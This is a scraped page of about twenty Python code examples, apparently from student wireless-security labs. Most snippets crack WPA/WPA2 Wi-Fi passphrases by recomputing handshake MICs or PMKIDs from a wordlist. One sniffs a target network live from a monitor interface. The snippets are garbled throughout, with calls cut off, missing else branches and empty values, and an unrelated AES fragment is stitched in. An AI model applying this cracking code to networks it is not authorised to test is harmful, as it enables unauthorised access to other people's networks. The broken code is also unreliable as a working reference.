예제 #1
def keyDerivation(passphrase, ssid, ap_mac, sta_mac, ANonce, SNonce, data,
    Calculate PMK/PTK/MIC

    A = "Pairwise key expansion"  #this string is used in the pseudo-random function
    B = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(
        ANonce, SNonce) + max(ANonce, SNonce)  #used in pseudo-random function

    #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
    passphrase = str.encode(passphrase)
    ssid = str.encode(ssid)
    pmk = pbkdf2(hashlib.sha1, passphrase, ssid, 4096, 32)

    #expand pmk to obtain PTK
    ptk = customPRF512(pmk, str.encode(A), B)

    #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
    if (hmac_algo == 1):
        mic = hmac.new(ptk[0:16], data, hashlib.md5)
    elif (hmac_algo == 2):
        mic = hmac.new(ptk[0:16], data, hashlib.sha1)

    return pmk, ptk, mic
예제 #2
def tryPmkid(passphrase, ssid, ap_mac, sta_mac):
    passphrase = str.encode(passphrase)
    pmk = pbkdf2(hashlib.sha1, passphrase, str.encode(ssid), 4096, 32)
    pmk_data = str.encode("PMK Name") + a2b_hex(ap_mac) + a2b_hex(sta_mac)
    pmkid = b2a_hex(hmac.new(pmk, pmk_data,
    return pmkid
예제 #3
def calcMIC(wpa):
    # Important parameters for key derivation - some of them can be obtained from the pcap file
    # passPhrase  = "actuelle" #this is the passphrase of the WPA network
    A = "Pairwise key expansion"  # this string is used in the pseudo-random function and should never be modified
    ssid = wpa[0].info  # "SWI"
    APmac = a2b_hex(wpa[1].addr2.replace(
        ":", ""))  # a2b_hex("cebcc8fdcab7") #MAC address of the AP
    Clientmac = a2b_hex(wpa[1].addr1.replace(
        ":", ""))  # a2b_hex("0013efd015bd") #MAC address of the client

    # Authenticator and Supplicant Nonces
    ANonce = a2b_hex(
    )  # a2b_hex("90773b9a9661fee1f406e8989c912b45b029c652224e8b561417672ca7e0fd91")
    SNonce = a2b_hex(
    )  # a2b_hex("7b3826876d14ff301aee7c1072b5e9091e21169841bce9ae8a3f24628f264577")

    # This is the MIC contained in the 4th frame of the 4-way handshake. I copied it by hand.
    # When trying to crack the WPA passphrase, we will compare it to our own MIC calculated using passphrases from a dictionary
    # mic_to_test = b2a_hex(wpa[8].load[77:93])  # "36eef66540fa801ceee2fea9b7929b40"
    mic_to_test = b2a_hex(wpa[8].load)[154:186]

    B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(
        ANonce, SNonce) + max(ANonce, SNonce)  # used in pseudo-random function

    # Take a good look at the contents of this variable. Compare it to the Wireshark last message of the 4-way handshake.
    # In particular, look at the last 16 bytes. Read "Important info" in the lab assignment for explanation
    data = bytes(wpa[8].payload.payload.payload.payload.payload)
    data = data[:-18] + data[-34:-18] + data[-2:]

    with open(filename) as dictionary:
        for passPhrase in dictionary:
            # calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
            passPhrase = str.encode(passPhrase)[:-1]

            pmk = pbkdf2(hashlib.sha1, passPhrase, ssid, 4096, 32)

            # expand pmk to obtain PTK
            ptk = customPRF512(pmk, str.encode(A), B)

            # calculate our own MIC over EAPOL payload - The ptk is, in fact, KCK|KEK|TK|MICK
            if int.from_bytes(wpa[5].load[0:1], byteorder='big') == 2:
                mic = hmac.new(ptk[0:16], data, hashlib.sha1)
                mic = hmac.new(ptk[0:16], data, hashlib.md5)

            # # the MIC for the authentication is actually truncated to 16 bytes (32 chars). SHA-1 is 20 bytes long.
            # MIC_hex_truncated = mic.hexdigest()[0:32]
            mic_digest = mic.hexdigest()[:-8]
            if mic_to_test.decode() == mic_digest:
                print("Found the passphrase : ", passPhrase)
                return True

        return False
예제 #4
def pkt_callback(pkt):

    # Read the passphrase from the file wordlist
    passPhrases = open("wordlist", "r").read().split("\n")

    A = "Pairwise key expansion"  #this string is used in the pseudo-random function

    #cf "Quelques détails importants" dans la donnée
    data = a2b_hex(

    if pkt.haslayer(EAPOL):

        # We supposed that the handshake packets are arriving in the correct order and one after another

        if (len(pktList) == 4):
            # Authenticator and Supplicant Nonces
            # We transform them to the correct encoding
            ANonce = a2b_hex(pktList[0].getlayer(Raw).load.hex()[26:90])
            SNonce = a2b_hex(pktList[1].getlayer(Raw).load.hex()[26:90])

            APmac = a2b_hex((pktList[0][Dot11].addr3).replace(":", ""))
            Clientmac = a2b_hex((pktList[0][Dot11].addr1).replace(":", ""))

            # This is the MIC contained in the 4th frame of the 4-way handshake
            # When attacking WPA, we would compare it to our own MIC calculated using passphrases from a dictionary
            mic_to_test = pktList[3].getlayer(Raw).load.hex()[154:-4]
            print("[*] MIC found: " + mic_to_test)

            B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(
                ANonce, SNonce) + max(ANonce,
                                      SNonce)  #used in pseudo-random function

            for passPhrase in passPhrases:

                # calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
                passPhrase = str.encode(passPhrase)

                pmk = pbkdf2(hashlib.sha1, passPhrase, str.encode(ssid), 4096,

                # expand pmk to obtain PTK
                ptk = customPRF512(pmk, str.encode(A), B)

                # calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
                mic = hmac.new(ptk[0:16], data, hashlib.sha1)

                if mic.hexdigest()[:len(mic_to_test)] == mic_to_test:
                    print("[*] The passphrase (" + str(passPhrase) +
                          ") is correct")

            print("[*] The passphrase: " + str(passPhrase) +
                  " is not correct. Try with a different passphrase")
def compute_pmkid(passphrase, ssid, bssid, sta_mac):
    Compute the PMKID for the given passphrase, BSSID and STA MAC address.
    :param passphrase: the passphrase
    :param bssid: the AP's BSSID
    :param sta_mac: the STA MAC address
    pmk = pbkdf2(hashlib.sha1, str.encode(passphrase), ssid, 4096, 32)
    data = b'PMK Name' + mac2str(bssid) + mac2str(sta_mac)
    return hmac.new(pmk, data,
                    hashlib.sha1).digest()[:16]  # first 128 bits only
예제 #6
def bruteForceWPA(handshakeList):
    global ssid
    global APmac
    global Clientmac

    # Authenticator and Supplicant Nonces
    nonceStartingOffset = 13
    nonceEndOffset = 45
    ANonce      = handshakeList[0].load[nonceStartingOffset:nonceEndOffset]
    SNonce      = handshakeList[1].load[nonceStartingOffset:nonceEndOffset]

    # This is the MIC contained in the 4th frame of the 4-way handshake
    # When attacking WPA, we would compare it to our own MIC calculated using passphrases from a dictionary
    micStartingOffset = 77
    micEndOffset = 93
    mic_to_test = handshakeList[3].load[micStartingOffset:micEndOffset]

    B           = min(APmac,Clientmac)+max(APmac,Clientmac)+min(ANonce,SNonce)+max(ANonce,SNonce) #used in pseudo-random function

    # Here we are taking the data from the WIFI version, until the start of the MIC, and then we simply append a bunch of zero bytes at the end.
    data        = bytes(handshakeList[3][EAPOL])[:micStartingOffset] + b'\x00' * 22
    ssid = str.encode(ssid)
    fileName = arguments.w
    found = False

    # Used to know wether it is HMAC-MD5 or HMAC-SHA1
    keyDescriptorVersion = int.from_bytes(handshakeList[0].load[0:1], byteorder='big')

    with open(fileName) as wordlist:
        for passPhrase in wordlist:
            # Calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
            # We are getting rid of the '\n'
            passPhrase = str.encode(passPhrase[:-1])
            pmk = pbkdf2(hashlib.sha1,passPhrase, ssid, 4096, 32)

            # Expand pmk to obtain PTK
            ptk = customPRF512(pmk,str.encode(A),B)

            # Calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
            if(keyDescriptorVersion == 2):
                # In the case of SHA-1, we have to truncate the hash in order for it to fit in the packet
                mic = hmac.new(ptk[0:16],data,hashlib.sha1).hexdigest()[:-8]
                mic = hmac.new(ptk[0:16],data,hashlib.md5).hexdigest()
            if mic == b2a_hex(mic_to_test).decode():
                print("[+] Found passphrase: " + passPhrase.decode())
                # Source: https://www.geeksforgeeks.org/python-exit-commands-quit-exit-sys-exit-and-os-_exit/
        if not found:
            print("[-] Passphrase not found !")
예제 #7
def crack():
    global ssid, APmac, Clientmac, ANonce, SNonce, mic_to_test, data, sniff, A
    print ("\n\nValues used to derivate keys")
    print ("============================")
    print ("SSID: ",ssid)
    print ("AP Mac: ",APmac.encode())
    print ("Cient Mac: ",Clientmac.encode())
    print ("AP Nonce: ",ANonce)
    print ("Client Nonce: ",SNonce)
    print ("Mic: ",mic_to_test)

    B = min(a2b_hex(APmac),a2b_hex(Clientmac))+max(a2b_hex(APmac),a2b_hex(Clientmac))+min(a2b_hex(ANonce),a2b_hex(SNonce))+max(a2b_hex(ANonce),a2b_hex(SNonce))
    # Load the wordlist and iterate over it
    with open("wordlist.txt") as f:
            passPhrase  = f.readline().replace("\n", "")

            if passPhrase == "":

            #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
            passPhrase = str.encode(passPhrase)
            pmk = pbkdf2(hashlib.sha1,passPhrase,ssid.encode(), 4096, 32)

            #expand pmk to obtain PTK
            ptk = customPRF512(pmk,str.encode(A),B)

            #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
            mic = hmac.new(ptk[0:16],data,hashlib.sha1)

            print ("\nResults of the key expansion")
            print ("=============================")
            print ("Passphrase: ",passPhrase)
            print ("PMK:\t\t",pmk.hex())
            print ("PTK:\t\t",ptk.hex())
            print ("KCK:\t\t",ptk[0:16].hex())
            print ("KEK:\t\t",ptk[16:32].hex())
            print ("TK:\t\t",ptk[32:48].hex())
            print ("MICK:\t\t",ptk[48:64].hex())
            print ("MIC:\t\t",mic.digest()[:-4])
            print ("ORIG MIC:\t",mic_to_test)

            # Check if the calculated mic is the same as the mic
            if mic_to_test == mic.digest()[:-4]:
                print("Found Passphrase: ", passPhrase.decode())

    print("Could not find passphrase")
예제 #8
def crack_pass(pkts, mic_to_test):
    passwords_file = open(wordlist_filename, 'r')
    passwords = passwords_file.readlines()
    passphrase_ret = "Not found"
    data = bytes(pkts[3][EAPOL])[:77] + b'\x00' * 22

    print("\nCracking WPA Passphrase")
    for psw in passwords:

        # We don't take the final '\n'
        passphrase = str.encode(psw[:-1])

        #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
        pmk = pbkdf2(hashlib.sha1, passphrase, str.encode(ssid), 4096, 32)

        #expand pmk to obtain PTK
        B = min(a2b_hex(APmac.replace(":", "")),
                a2b_hex(Clientmac.replace(":", ""))) + max(
                    a2b_hex(APmac.replace(":", "")),
                    a2b_hex(Clientmac.replace(":", ""))) + min(
                        a2b_hex(ANonce), a2b_hex(SNonce)) + max(
                            a2b_hex(ANonce), a2b_hex(SNonce))
        ptk = customPRF512(pmk, str.encode(A), B)

        #Check if it's MD5 or SHA1 with the KeyDescriptorVersion
        kdv = int.from_bytes(pkts[3].load[0:1], byteorder='big')

        #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
        if kdv == 2:
            mic = hmac.new(ptk[0:16], data, hashlib.sha1).hexdigest()[:-8]
            mic = hmac.new(ptk[0:16], data, hashlib.md5).hexdigest()

        print("Passphrase tested : ", psw)

        #Compare the MICs
        if hmac.compare_digest(mic, mic_to_test):
            print("\nPassphrase found !\n")
            passphrase_ret = psw

    print("\nResult of the passphrase cracking")
    print("The passphrase is : ", passphrase_ret, "\n")

def get_passphrase(pmkid, ssid, mac_ap, mac_sta):
    # format data
    ssid = ssid.encode()
    mac_ap = a2b_hex(mac_ap.replace(':', ''))
    mac_sta = a2b_hex(mac_sta.replace(':', ''))
    pmkid = pmkid.decode('utf-8')

    with open("wordlist.txt") as f:
        for line in f:
            passphrase = line.replace('\n', '').encode()
            # generate pmk with a passphrase from the wordlist
            pmk = pbkdf2(hashlib.sha1, passphrase, ssid, 4096, 32)
            # generate pmkid related to the actual passphrase
            pmkid_calc = hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta,

            # if they match it means we got the right passphrase
            if (pmkid == pmkid_calc):
                return passphrase
    return None
예제 #10
# Read capture file -- it contains beacon, authentication, associacion, handshake and data

# Important parameters for key derivation - most of them can be obtained from the pcap file
ssid        = wpa[0].info
APmac       = a2b_hex(wpa[145].addr2.replace(':',''))
Clientmac   = a2b_hex(wpa[145].addr1.replace(':',''))
PMKID       = hexlify(wpa[145].load[101:])

print("SSID :", ssid.decode("utf-8"))
print("AP Mac :", b2a_hex(APmac).decode("utf-8"))
print("Client Mac :", b2a_hex(Clientmac).decode("utf-8"))

#Lecture du fichier de mdp
mdpFile = open('rockyou-65.txt', 'r') 
lines = mdpFile.readlines()

#Test de tous les mots de passe de la liste
for line in lines :
    password = str.encode(line[:-1])
    pmk = pbkdf2(hashlib.sha1,password, ssid, 4096, 32)
    pmkid = hmac.new(pmk, str.encode("PMK Name") + APmac + Clientmac, hashlib.sha1).hexdigest()[:32]
    print(password.decode("utf-8"), pmkid, PMKID.decode("utf-8") )
    #Comparaison du PMKID (trouvé dans le fichier pcap) et le PMKID générer avec le mot de passe de la liste 
    if(pmkid == PMKID.decode("utf-8") ):
        print("The passephrase is " + line)
예제 #11
from Crypto.Cipher import AES
import os
#import PBKDF2
import pbkdf2

#from pbkdf2 import pbkdf2
salt = os.urandom(8)  # 64-bit salt
key = pbkdf2("This passphrase is a secret.", salt).read(32)  # 256-bit key
iv = os.urandom(16)  # 128-bit IV
cipher = AES.new(key, AES.MODE_CBC, iv)
예제 #12
mic_to_test = wpa[8].load.hex()[-36:][:
                                      -4]  # "36eef66540fa801ceee2fea9b7929b40"
B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(ANonce, SNonce) + max(
    ANonce, SNonce)  #used in pseudo-random function
data = a2b_hex(
    scapy.utils.linehexdump(wpa[8][EAPOL], 0, 1, True).replace(
        " ", "").lower()[:162] + "0" * 32 + "0" * 4)

with open('dico.txt') as f:
    for passPhrase in f:
        if (passPhrase[-1] == '\n'):
            passPhrase = passPhrase[:-1]

        #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
        pmk = pbkdf2(hashlib.sha1, passPhrase.encode(), ssid, 4096, 32)

        #expand pmk to obtain PTK
        ptk = customPRF512(pmk, str.encode(A), B)

        #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
        mic = hmac.new(ptk[0:16], data, hashlib.sha1)

        # We remove the icv, because it's not relevant for the attack.
        #Mic comparison
        if (mic.hexdigest()[:-8] == mic_to_test):
            foundPassphrase = True

            print("\n\npassPhrase found, value : ", passPhrase, "\n")
            print("Values used to derivate keys")
def PMKID(key, ssid, staMAC, apMAC):
    key = pbkdf2(hashlib.sha1, key, ssid, 4096, 32)
    return hmac.new(key,
                    str.encode('PMK Name') + apMAC + staMAC,
예제 #14
def main():
    APmac = b''
    Clientmac = b''
    ANonce = b''
    SNonce = b''
    crypto = b''
    mic_to_test = b''

    # Get 1000 packages from the monitor interface
    wpa = sniff(iface='wlp1s0mon', count=1000)

    # The network to attack
    ssid = "SWI"

    # Get the Association request who contains APmac address, Clientmac address and the ssid
    # We verify if the packet is from the network to attack
    for trame in wpa:
        if trame.subtype == 0x0 and trame.type == 0x0 and trame.info.decode(
                "ascii") == ssid:
            APmac = a2b_hex(trame.addr1.replace(':', ''))
            Clientmac = a2b_hex(trame.addr2.replace(':', ''))

    # Get the ANonce based on the MAC address
    for trame in wpa:
        if trame.subtype == 0x0 \
                and trame.type == 0x2 \
                and a2b_hex(trame.addr2.replace(':', '')) == APmac \
                and a2b_hex(trame.addr1.replace(':', '')) == Clientmac:
            ANonce = trame.getlayer(WPA_key).nonce

    isSNonceKnown = False

    for trame in wpa:
        # Get the SNonce based on the MAC address
        if not isSNonceKnown \
                and trame.subtype == 0x8 \
                and trame.type == 0x2 \
                and a2b_hex(trame.addr1.replace(':', '')) == APmac \
                and a2b_hex(trame.addr2.replace(':', '')) == Clientmac:

            SNonce = raw(trame)[65:-72]
            isSNonceKnown = True

        # Get the WPA key MIC
        elif trame.subtype == 0x8 \
                and trame.type == 0x2 \
                and a2b_hex(trame.addr1.replace(':', '')) == APmac \
                and a2b_hex(trame.addr2.replace(':', '')) == Clientmac:

            mic_to_test = raw(trame)[-18:-2].hex()

            # Get the value of the key Information MD5 (1) or SHA1 (2)
            crypto = raw(trame)[0x36] & 0x2

    # ---------------------------------------------------------------

    # Get a list of passPhrase from the wordlist
    wordlist = open("wordlist.txt", "r")
    passPhrases = [x.strip() for x in wordlist.readlines()]

    ssid = str.encode(ssid)

    # Test chaque passPhrase
    for passPhrase in passPhrases:
        # Important parameters for key derivation - most of them can be obtained from the pcap file
        A = "Pairwise key expansion"  # this string is used in the pseudo-random function
        B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(
            ANonce, SNonce) + max(ANonce,
                                  SNonce)  # used in pseudo-random function
        data = a2b_hex(
        )  # cf "Quelques détails importants" dans la donnée

        # calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
        passPhrase = str.encode(passPhrase)

        # MD5 = 0x01 & SHA1 = 0x02
        if crypto == 0x01:
            pmk = pbkdf2(hashlib.md5, passPhrase, ssid, 4096, 32)
            pmk = pbkdf2(hashlib.sha1, passPhrase, ssid, 4096, 32)

        # expand pmk to obtain PTK
        ptk = customPRF512(pmk, str.encode(A), B)

        # calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
        mic = hmac.new(ptk[0:16], data, hashlib.sha1)

        # Test if the current passphrase is valid
        if mic_to_test == mic.hexdigest()[:32]:
            print("You win ! The passphrase is : " + passPhrase.decode())
            return False

    return True
예제 #15
print("\n\nValues used to derivate keys")
print("Passphrase: ", passPhrase, "\n")
print("SSID: ", ssid, "\n")
print("AP Mac: ", b2a_hex(APmac), "\n")
print("CLient Mac: ", b2a_hex(Clientmac), "\n")
print("AP Nonce: ", b2a_hex(ANonce), "\n")
print("Client Nonce: ", b2a_hex(SNonce), "\n")
ssid = str.encode(ssid)
wpaVersion = wpa[8][EAPOL].load[2]  #Contient la version description de la clé
# Test chaque passephrase du dictionnaire
for i in range(len(dic)):
    #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
    passPhrase = str.encode(dic[i])

    pmk = pbkdf2(hashlib.sha1 if wpaVersion == 10 else hashlib.md5, passPhrase,
                 ssid, 4096, 32)

    #expand pmk to obtain PTK
    ptk = customPRF512(pmk, str.encode(A), B)

    #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
    mic = hmac.new(ptk[0:16], data, hashlib.sha1).hexdigest()[:-8]

    print("Mic to test : ", mic_to_test, "\n")
    print("Mic generated : ", mic, "\n")
    if mic == mic_to_test:
        print("Good passphrase : ", passPhrase.decode(), "\n")
        print("Bad passphrase : ", passPhrase.decode(), "\n")
        if i == len(dic) - 1:
B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(ANonce, SNonce) + max(
    ANonce, SNonce)  #used in pseudo-random function

data = a2b_hex(
)  #cf "Quelques détails importants" dans la donnée

ssid = str.encode(ssid)

for word in passphrase:
    wordEncode = str.encode(word)

    # Check the version of the key to apply MD5 or SHA-1
    if keyInformation != 10:
        pmk = pbkdf2(hashlib.md5, wordEncode, ssid, 4096, 32)
        pmk = pbkdf2(hashlib.sha1, wordEncode, ssid, 4096, 32)

    #expand pmk to obtain PTK
    ptk = customPRF512(pmk, str.encode(A), B)
    #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK, [:-8] to remove the ICV
    mic = hmac.new(ptk[0:16], data, hashlib.sha1).hexdigest()[:-8]

    # Test if the two mic match, if yes print message and stop, if not continue to check with the word in file
    if mic == mic_to_test:
        print("The passphrase used is correct : ", word, "\n")
        print("Try a new passphrase : ", word, "\n")
    passphrases = [word for line in file for word in line.split()]

# For each potential passphrase in the file we calculate the MIC
for passPhrase in passphrases:
    print("Passphrase tested     : ", passPhrase)

    A = "Pairwise key expansion"  #this string is used in the pseudo-random function
    B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(
        ANonce, SNonce) + max(ANonce, SNonce)  #used in pseudo-random function
    data = a2b_hex(
    )  #cf "Quelques détails importants" dans la donnée

    #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
    passPhrase = str.encode(passPhrase)
    pmk = pbkdf2(hashlib.sha1, passPhrase, str.encode(ssid), 4096, 32)

    #expand pmk to obtain PTK
    ptk = customPRF512(pmk, str.encode(A), B)

    #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
    mic = hmac.new(ptk[0:16], data, hashlib.sha1)

    # MIC calculated with key derivated from potential passphrase tested
    current_mic = mic.hexdigest()[:-8]

    # If the MIC calculated above is the same as the one from the last 4-way handshake message, we found the passphrase
    if current_mic == mic_to_test:
        print("PASSPHRASE FOUND      : ", passPhrase.decode())
for i in range(len(wpa)):
    if wpa[i].haslayer(EAPOL):
         Il s'agit des informations de la clé (Champs <<Key Information>>), elle définit les différents flags tel que les clés qui sont "set" ou non, s'il y a une erreur, etc... .
         La valeur 0x008a au niveau des flags de la clé est toujours la même pour le message 1 dans la pcap de ce labo ou du labo précédent.
        if wpa[i][EAPOL].original.hex()[10:14] == "008a":
            wpaMessageOne = wpa[i]
            PMKID = binascii.hexlify(wpaMessageOne.getlayer(Raw).load)[
                202:234]  # Extraction de la PMKID.
            if PMKID != nullPMKID and PMKID != '':
                found = True
                break  # On évite de bouclé inutilement si on trouve le message 1 du 4 way handshake.
if not found:
    exit("No PMKID found")

print("PMKID      : ", PMKID.decode())
print("AP Mac     : ", b2a_hex(APmac).decode())
print("Client Mac : ", b2a_hex(Clientmac).decode())

for i in range(len(dic)):
    passPhrase = str.encode(dic[i])
    pmk = pbkdf2(hashlib.sha1, bytes(passPhrase), ssid.encode('utf-8'), 4096,
    pmkid_calc = hmac.new(pmk,
                          "PMK Name".encode('utf-8') + APmac + Clientmac,

    if pmkid_calc[:-8].encode('utf-8') == PMKID:
        print("\nMot de passe trouvé : ", passPhrase.decode())
예제 #19

pmkid = hexlify(handshake.load)[-32:]
ap_mac = a2b_hex(str.replace(handshake.addr2, ":", ""))
client_mac = a2b_hex(str.replace(handshake.addr1, ":", ""))

data = A.encode() + ap_mac + client_mac

found = False

with open(filename) as dictionary:
    for passPhrase in dictionary:
        # calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
        passPhrase = str.encode(passPhrase)[:-1]

        pmk = pbkdf2(hashlib.sha1, passPhrase, ssid, 4096, 32)

        pmkid_calc = hmac.new(pmk, data, hashlib.sha1)

        test = pmkid_calc.hexdigest()[:-8]

        if pmkid == str.encode(test):
            print("Passphrase is : " + passPhrase.decode())
            found = True

    if not found:
        print("No passphrase found")
예제 #20
    except Exception as e:

print("\nValues used to execute PKMID attack")
print("SSID: ", ssid.decode("utf-8"))
print("AP Mac: ", b2a_hex(APmac).decode("utf-8"))
print("CLient Mac: ", b2a_hex(Clientmac).decode("utf-8"), "\n")

# Début de l'attaque PMKID
print("Starting the PMKID attack")
with open('dictionnary'
          ) as dictionnary:  # Ouverture du dictionnaire personnalisé
    for currentPass in dictionnary:  # On parcourt tous les mots du dictionnaire
        currentPass = currentPass[:-1]  # On enleve le \n
        print("Testing " + currentPass)
        currentPass = str.encode(
            currentPass)  # On transforme la string en bytes
        pmkTmp = pbkdf2(hashlib.sha1, currentPass, ssid, 4096,
                        32)  # Calcul du PMK
        pmkidTmp = hmac.new(pmkTmp,
                            str.encode("PMK Name") + APmac + Clientmac,
                            )[:32]  # Calcul du PMKID pour le pass courant
        if (
                pmkid == str.encode(pmkidTmp)
        ):  # On vérifie si le PMKID calculé est le même que celui récupéré dans les trames, si oui on arrête si non on test une autre passphrase.
            print("!!! pass found " + currentPass.decode("utf-8") + " !!!")
예제 #21
mic_to_test = wpa[8].load[77:93] #c'est le 4eme handshake qui contient le mic #"36eef66540fa801ceee2fea9b7929b40"

B           = min(APmac,Clientmac)+max(APmac,Clientmac)+min(ANonce,SNonce)+max(ANonce,SNonce) #used in pseudo-random function

data        = bytes(wpa[8][EAPOL])[0:77] + b'\x00'*(len(mic_to_test)+6) #we copy until where the mic start, then pad with the length of the mix + some bytes to have only zeros at the end

ssid = str.encode(ssid)

# read wordlist line by line
with open('wordlist.txt') as fp:
    passPhrase = fp.readline()[:-1]
    found = False
    while passPhrase:
        pp = str.encode(passPhrase)
        # calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
        pmk = pbkdf2(hashlib.sha1,pp, ssid, 4096, 32)
        # expand pmk to obtain PTK
        ptk = customPRF512(pmk,str.encode(A),B)

        # calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK

        # compute mic from pass phrase
        mic = hmac.new(ptk[0:16],data,algo).digest()[:16]

        # test the computed mic with the mic from the handshake
        if mic.hex() == mic_to_test.hex():
            print("The pass phrase is : " + passPhrase)
            found = True

        passPhrase = fp.readline()[:-1]